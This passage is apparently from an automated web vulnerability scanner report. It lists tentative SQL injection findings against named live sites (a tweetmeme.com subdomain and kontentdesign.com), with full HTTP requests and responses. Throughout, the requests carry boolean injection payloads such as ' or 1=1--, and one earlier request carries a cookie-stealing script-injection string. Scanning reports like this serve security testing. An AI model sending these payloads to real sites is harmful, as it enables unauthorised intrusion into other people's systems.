User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3737471162188127&output=html%00''&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

1.7. http://hairmakeup.tweetmeme.com/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hairmakeup.tweetmeme.com
Path:	/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 15809153'%20or%201%3d1--%20 and 15809153'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)15809153'%20or%201%3d1--%20
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:02 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=72d3fdf7986a5f2dd94d024f91a05628; expires=Tue, 01-Feb-2011 15:05:02 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0073239803314209
X-Served-In: 0.05068302154541
X-Served-By: h03
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <title
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=channel_hairmakeup&width=300&height=250&rand=9882624324">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=7224643832" alt="*" width="1" height="1" /><div class="new item">

<h2 class="top">Top Tweeted Stories</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834295568/flier-beats-tsa-video-recording-charge-in-court-boing-boing" title="Flier beats TSA video recording charge in court - Boing Boing">

Flier beats TSA video recording charge in court - Boing…
</a> - <span class="green">345 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835712317/brain-controlled-wheelchair-healthymagination" title="Brain Controlled Wheelchair : Healthymagination">

Brain Controlled Wheelchair : Healthymagination
</a> - <span class="green">35 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834850527
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)15809153'%20or%201%3d2--%20
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:19 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=07cb4d1801e9dcd82851395d478c0373; expires=Tue, 01-Feb-2011 15:05:19 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0065698623657227
X-Served-In: 0.042007923126221
X-Served-By: ded2059
Content-Length: 42145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <title
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=channel_hairmakeup&width=300&height=250&rand=89513938187">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=16601502518" alt="*" width="1" height="1" /><div class="new item">

<h2 class="top">Top Tweeted Stories</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834295568/flier-beats-tsa-video-recording-charge-in-court-boing-boing" title="Flier beats TSA video recording charge in court - Boing Boing">

Flier beats TSA video recording charge in court - Boing…
</a> - <span class="green">345 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835712317/brain-controlled-wheelchair-healthymagination" title="Brain Controlled Wheelchair : Healthymagination">

Brain Controlled Wheelchair : Healthymagination
</a> - <span class="green">35 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a href="http://tweetmeme.com/story/38348505
...[SNIP]...

1.8. http://kontentdesign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11239645%20or%201%3d1--%20 and 11239645%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?111239645%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 24 Jan 2011 22:39:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Length: 518
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /?111239645%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 352408000473833862436b9fb7dcdeb1=7f8f1170d789cbd763ae5c69a60d1034; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:17 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" >
<head>
<base href="http://kontentdesign.com/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="kontent, design, joomla, san francisco, ron severdia, brand workspace, iphone" />
<meta name="description" content="Specialists in Design, User Experience, Brand Workspace and Joomla." />
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
<title>Kontent Design :: Award Winning Creative</title>
<link href="/templates/kontent11/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="/plugins/content/ronbox/ronbox.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/reset.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/layout.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/typography.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/menus.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/modules.css" type="text/
...[SNIP]...

1.9. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/media/system/js/caption.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 53092844'%20or%201%3d1--%20 and 53092844'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media53092844'%20or%201%3d1--%20/system/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:01:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media53092844' or 1=1-- /system/js/caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media53092844'%20or%201%3d2--%20/system/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:01:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media53092844' or 1=2-- /system/js/caption.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.10. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/media/system/js/caption.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 35124081'%20or%201%3d1--%20 and 35124081'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system35124081'%20or%201%3d1--%20/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:03:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system35124081' or 1=1-- /js/caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system35124081'%20or%201%3d2--%20/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:03:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media/system35124081' or 1=2-- /js/caption.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.11. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/media/system/js/caption.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 80142346'%20or%201%3d1--%20 and 80142346'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system/js80142346'%20or%201%3d1--%20/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:05:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system/js80142346' or 1=1-- /caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system/js80142346'%20or%201%3d2--%20/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:05:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media/system/js80142346' or 1=2-- /caption.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.12. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/media/system/js/caption.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16186106'%20or%201%3d1--%20 and 16186106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system/js/caption.js16186106'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system/js/caption.js16186106' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system/js/caption.js16186106'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:07:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media/system/js/caption.js16186106' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.13. http://kontentdesign.com/media/system/js/caption.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/media/system/js/caption.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15832840%20or%201%3d1--%20 and 15832840%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system/js/caption.js?115832840%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:08:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 544

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system/js/caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system/js/caption.js?115832840%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:08:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Sat, 24 Apr 2010 05:05:40 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:08:54 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 1963

/**
